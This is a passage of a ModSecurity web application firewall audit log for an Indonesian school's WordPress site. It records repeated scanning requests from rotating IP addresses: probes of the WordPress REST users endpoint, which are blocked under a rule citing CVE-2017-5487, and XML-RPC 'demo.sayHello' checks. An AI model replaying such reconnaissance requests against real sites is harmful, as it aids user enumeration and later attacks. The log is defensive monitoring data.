Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6b707d75-C-- demo.sayHello --6b707d75-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6b707d75-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424891029732 4913 (- - -) Stopwatch2: 1747424891029732 4913; combined=3281, p1=481, p2=2625, p3=30, p4=31, p5=68, sr=56, sw=46, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6b707d75-Z-- --2e494c57-A-- [17/May/2025:02:49:05 +0700] aCeWsce47ocjCGWTS4Y_AQAAAEg 103.236.140.4 54282 103.236.140.4 8181 --2e494c57-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.176.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.176.97 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2e494c57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e494c57-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424945180601 2889 (- - -) Stopwatch2: 1747424945180601 2889; combined=1360, p1=451, p2=879, p3=0, p4=0, p5=30, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e494c57-Z-- --12963345-A-- [17/May/2025:02:49:10 +0700] aCeWtthEtho3ciA0weheBAAAAJQ 103.236.140.4 54286 103.236.140.4 8181 --12963345-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.176.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.176.97 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --12963345-C-- demo.sayHello --12963345-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --12963345-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424950279817 6038 (- - -) Stopwatch2: 1747424950279817 6038; combined=4348, p1=585, p2=3528, p3=33, p4=38, p5=96, sr=80, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --12963345-Z-- --2e679208-A-- [17/May/2025:02:49:27 +0700] aCeWx9hEtho3ciA0weheBQAAAJY 103.236.140.4 54290 103.236.140.4 8181 --2e679208-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.165.23 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.165.23 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2e679208-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e679208-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424967272824 3684 (- - -) Stopwatch2: 1747424967272824 3684; combined=1441, p1=493, p2=903, p3=0, p4=0, p5=45, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e679208-Z-- --2bda211d-A-- [17/May/2025:02:49:31 +0700] aCeWy0E0LfP59mkCzg41_AAAAMs 103.236.140.4 54294 103.236.140.4 8181 --2bda211d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.165.23 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.165.23 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2bda211d-C-- demo.sayHello --2bda211d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2bda211d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424971032364 5822 (- - -) Stopwatch2: 1747424971032364 5822; combined=4233, p1=540, p2=3470, p3=28, p4=31, p5=96, sr=86, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2bda211d-Z-- --48c6295a-A-- [17/May/2025:02:49:50 +0700] aCeW3thEtho3ciA0weheCAAAAIA 103.236.140.4 54298 103.236.140.4 8181 --48c6295a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.135 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.135 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --48c6295a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --48c6295a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424990083934 3077 (- - -) Stopwatch2: 1747424990083934 3077; combined=1337, p1=448, p2=859, p3=0, p4=0, p5=30, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48c6295a-Z-- --11100865-A-- [17/May/2025:02:49:56 +0700] aCeW5EE0LfP59mkCzg41_QAAANM 103.236.140.4 54302 103.236.140.4 8181 --11100865-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.135 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.135 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --11100865-C-- demo.sayHello --11100865-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --11100865-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747424996289301 5625 (- - -) Stopwatch2: 1747424996289301 5625; combined=4167, p1=552, p2=3391, p3=33, p4=37, p5=92, sr=78, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --11100865-Z-- --06d5cd13-A-- [17/May/2025:02:50:18 +0700] aCeW-thEtho3ciA0weheDgAAAJE 103.236.140.4 54314 103.236.140.4 8181 --06d5cd13-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.76 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --06d5cd13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --06d5cd13-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425018306855 2919 (- - -) Stopwatch2: 1747425018306855 2919; combined=1292, p1=448, p2=817, p3=0, p4=0, p5=27, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --06d5cd13-Z-- --21762062-A-- [17/May/2025:02:50:23 +0700] aCeW_9hEtho3ciA0weheEQAAAI8 103.236.140.4 54322 103.236.140.4 8181 --21762062-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.76 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.76 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --21762062-C-- demo.sayHello --21762062-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --21762062-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425023126904 5061 (- - -) Stopwatch2: 1747425023126904 5061; combined=3862, p1=493, p2=3156, p3=30, p4=32, p5=90, sr=68, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --21762062-Z-- --795d5e10-A-- [17/May/2025:02:50:24 +0700] aCeXAMe47ocjCGWTS4Y_AwAAAEs 103.236.140.4 54324 103.236.140.4 8181 --795d5e10-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.193.81 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.193.81 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --795d5e10-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --795d5e10-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425024284618 2438 (- - -) Stopwatch2: 1747425024284618 2438; combined=1163, p1=471, p2=663, p3=0, p4=0, p5=28, sr=102, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --795d5e10-Z-- --0d292c14-A-- [17/May/2025:02:50:29 +0700] aCeXBdhEtho3ciA0weheEwAAAIE 103.236.140.4 54330 103.236.140.4 8181 --0d292c14-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.90 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0d292c14-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0d292c14-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425029275677 1961 (- - -) Stopwatch2: 1747425029275677 1961; combined=948, p1=317, p2=602, p3=0, p4=0, p5=28, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0d292c14-Z-- --4233cc43-A-- [17/May/2025:02:50:30 +0700] aCeXBthEtho3ciA0weheFAAAAI0 103.236.140.4 54332 103.236.140.4 8181 --4233cc43-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.193.81 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.193.81 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4233cc43-C-- demo.sayHello --4233cc43-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4233cc43-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425030597507 4760 (- - -) Stopwatch2: 1747425030597507 4760; combined=3659, p1=407, p2=3038, p3=28, p4=25, p5=93, sr=65, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4233cc43-Z-- --9516b24c-A-- [17/May/2025:02:50:32 +0700] aCeXCNhEtho3ciA0weheFQAAAJQ 103.236.140.4 54334 103.236.140.4 8181 --9516b24c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.235 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.235 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9516b24c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9516b24c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425032896246 2122 (- - -) Stopwatch2: 1747425032896246 2122; combined=1006, p1=336, p2=639, p3=0, p4=0, p5=31, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9516b24c-Z-- --c0d38615-A-- [17/May/2025:02:50:36 +0700] aCeXDNhEtho3ciA0weheGQAAAIA 103.236.140.4 54342 103.236.140.4 8181 --c0d38615-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.90 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c0d38615-C-- demo.sayHello --c0d38615-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c0d38615-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425036504197 4727 (- - -) Stopwatch2: 1747425036504197 4727; combined=3648, p1=421, p2=3017, p3=25, p4=23, p5=94, sr=66, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c0d38615-Z-- --78011604-A-- [17/May/2025:02:50:37 +0700] aCeXDdhEtho3ciA0weheGgAAAIU 103.236.140.4 54344 103.236.140.4 8181 --78011604-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.235 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.235 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --78011604-C-- demo.sayHello --78011604-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --78011604-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425037950659 4508 (- - -) Stopwatch2: 1747425037950659 4508; combined=3591, p1=413, p2=2978, p3=24, p4=26, p5=89, sr=71, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --78011604-Z-- --2a78be6c-A-- [17/May/2025:02:50:50 +0700] aCeXGthEtho3ciA0weheHQAAAIc 103.236.140.4 54350 103.236.140.4 8181 --2a78be6c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.79.28 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.79.28 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2a78be6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a78be6c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425050372549 2816 (- - -) Stopwatch2: 1747425050372549 2816; combined=1319, p1=431, p2=857, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a78be6c-Z-- --c3f15d68-A-- [17/May/2025:02:50:55 +0700] aCeXH9hEtho3ciA0weheHwAAAJA 103.236.140.4 54354 103.236.140.4 8181 --c3f15d68-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.202.79.28 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.79.28 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c3f15d68-C-- demo.sayHello --c3f15d68-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c3f15d68-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425055312911 4772 (- - -) Stopwatch2: 1747425055312911 4772; combined=3709, p1=455, p2=3056, p3=24, p4=25, p5=88, sr=68, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c3f15d68-Z-- --23ccb706-A-- [17/May/2025:02:50:59 +0700] aCeXI9hEtho3ciA0weheIQAAAIg 103.236.140.4 54358 103.236.140.4 8181 --23ccb706-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: 